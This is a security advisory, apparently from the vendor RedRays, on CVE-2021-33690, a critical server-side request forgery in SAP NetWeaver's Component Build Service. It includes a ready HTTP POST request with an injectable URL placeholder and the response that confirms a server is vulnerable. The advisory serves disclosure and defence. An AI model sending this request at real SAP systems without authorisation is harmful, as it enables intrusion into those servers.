Skip links
Vahagn Vardanian

Vahagn Vardanian

Co-founder and CTO of RedRays

[CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure

Application: SAP NetWeaver AS Java
Versions Affected: SAP NetWeaver Development Infrastructure Component Build Service versions – 7.11, 7.20, 7.30, 7.31, 7.40, 7.50
Vendor URL: https://sap.com/
Bug: SSRF
Date of Public Advisory: June 1, 2023
Reference: [https://nvd.nist.gov/vuln/detail/CVE-2021-33690]
SAP Note: 3072955 
SAP Approved Fixes: True
Status: analyzed and published

ADVISORY INFORMATION

Title: [CVE-2021-33690] Server-Side Request Forgery Vulnerability in SAP NetWeaver Development Infrastructure
Risk: Critical
Advisory URL: https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/
Date published: June 1, 2023

VULNERABILITY INFORMATION

Remotely Exploitable: Yes
Locally Exploitable: No

CVSS Information

CVSS v3.1 Base Score: 9.9 / 10 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

VULNERABILITY DESCRIPTION

A vulnerability known as Server-Side Request Forgery (SSRF) has been identified in various versions of the SAP NetWeaver Development Infrastructure Component Build Service, namely 7.11, 7.20, 7.30, 7.31, 7.40, and 7.50. This weakness within the SAP NetWeaver Development Infrastructure Component Build Service gives an attacker, who has server access, the ability to execute proxy attacks via specially tailored queries. The aftermath of such attacks can lead to the complete compromise of sensitive server data, affecting its accessibility. It’s crucial to note that the severity of this vulnerability is contingent on whether the SAP NetWeaver Development Infrastructure (NWDI) operates on the intranet or the internet. The CVSS score has been calculated based on the worst-case situation, which presumes it operates online.

TECHNICAL DESCRIPTION

To determine if the server is vulnerable to SSRF, send the following request:

POST /tc.CBS.Appl/tcspseudo HTTP/1.1
Host: redrayssap:50000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded

CBS=http://%YOUR_PAYLOAD%&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE

If the following response is received, it implies the presence of the vulnerability:

Could not connect to the CBS.

About RedRays

RedRays is a premier cybersecurity enterprise that safeguards ERP systems against internal fraudulent activities and external cyber threats. We take pride in delivering robust security solutions for large corporations and managed service providers that depend on major ERP systems like SAP, Oracle, and Microsoft. Utilizing advanced tools and strategies, we proactively supervise and control security in extensive SAP environments globally.

Our primary goal is to bridge the security gap from both a technical and business perspective, ensuring our clients’ seamless operations and safeguarding their precious data. We at RedRays, are committed to upholding top-tier security standards while providing extraordinary client service and assistance.

About RedRays R&D

The cornerstone of RedRays’ accomplishments lies in our research and development (R&D) unit, specializes in studying and analyzing vulnerabilities in essential corporate applications. Our R&D initiatives have earned acknowledgment and admiration from leading software firms such as SAP, Oracle, Microsoft Dynamics, and IBM. This dedication to research enables us to anticipate emerging threats and craft bespoke security solutions that cater to our clients’ needs.

Our team comprises seasoned professionals with diverse skill sets spanning various security domains, such as vulnerability evaluation, penetration testing, incident management, and threat intelligence. Our commitment is to perform rigorous research and deliver avant-garde solutions to fortify SAP systems against ever-changing threats.

Send message

Explore More

Special offer for SAP Security Udemy course!

$ 9.99

Join “SAP Security Core Concepts and Security Administration” which is part of the Blackhat course series.